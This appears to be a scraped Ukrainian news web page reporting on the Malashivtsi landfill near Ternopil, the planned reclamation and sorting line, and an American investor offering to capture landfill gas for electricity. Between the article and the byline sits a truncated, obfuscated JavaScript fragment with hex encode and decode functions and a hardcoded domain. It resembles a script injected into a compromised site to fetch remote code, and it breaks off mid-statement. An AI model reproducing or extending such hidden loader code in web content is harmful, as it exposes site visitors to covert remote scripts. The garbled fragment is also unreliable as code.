Ви знаходитесь: Головна / Новини / Американський інвестор готовий взятися за сміттєзвалище в Малашівцях

Американський інвестор готовий взятися за сміттєзвалище в Малашівцях

Проблема сміттєзвалищ, яку нещодавно дуже гостро відчули на собі жителі Львівщини, актуальна і в багатьох інших містах країни. Адже, ні сортування, ні переробка сміття, як в Європі, в Україні – не поширена, а то й майже відсутня. Найбільше потерпають від могильників відходів мешканці найближчих довколишніх сіл та селищ.

мешканка с. Малашівці

«Ми цим дихаємо, здоров’я в людей таке тут дуже погане, дуже часто хворіють, кашляють, бронхіти мають».

Щоправда, зараз, кажуть,  ситуація краща, ніж кілька років тому. Систематично проводиться рекультивація, а сміття більше не горить.

ОРЕСТ СІНГАЛЕВИЧ, начальник управління екології та природних ресурсів Тернопільської ОДА

«Можемо констатувати, що ситуація в нас стабілізована, по сміттєзвалищу. Виготовлено проект рекультивації сміттєзвалища. Він реалізовується, зараз завершується процедура надання земельної ділянки для спорудження об’єктів, пов’язаних з поводженням з твердими побутовими відходами».

Що ж до сміттєсортувальної лінії, то слова поступово переходять в дію. Зокрема, вже незабаром для цього буде відведена окрема ділянка. До того ж, як зізнався міський голова Тернополя Сергій Надал, є інвестор, який готовий взятися за дегазацію сміттєзвалища.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Вже є розроблений перший проект землеустрою. Ми працюємо у цьому напрямку разом, я думаю, що найближчим часом земля все ж таки буде закріплена і узаконена за управлінням ЖКГ міської ради і ми зможемо робити там повноцінні роботи по дегазації, оскільки, є вже американський інвестор, який готовий вже ставити там спеціальне обладнання для того, щоб витягнути цей газ, який є небезпечний,  і його можна перетворити в електроенергію, і дати додаткові робочі місця, там може бути встановлена сміттєсортувальна лінія, і будь-який інший об’єкт, який може займатися цивілізованою переробкою твердих побутових відходів».

Але чисто там, де не смітять, або принаймні дбають про екологію. Адже, навіть елементарне використання паперових пакетів, а не поліетиленових, позбавить землю від їх розкладання на кілька століть. Перші кроки у цьому напрямку Тернопіль уже зробив. На останній сесії міськради депутати підтримали звернення до Верховної Ради і Міністерства екології щодо прискорення прийняття проекту Закону «Про обмеження виробництва, використання, ввезення та розповсюдження полімерних пакетів».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top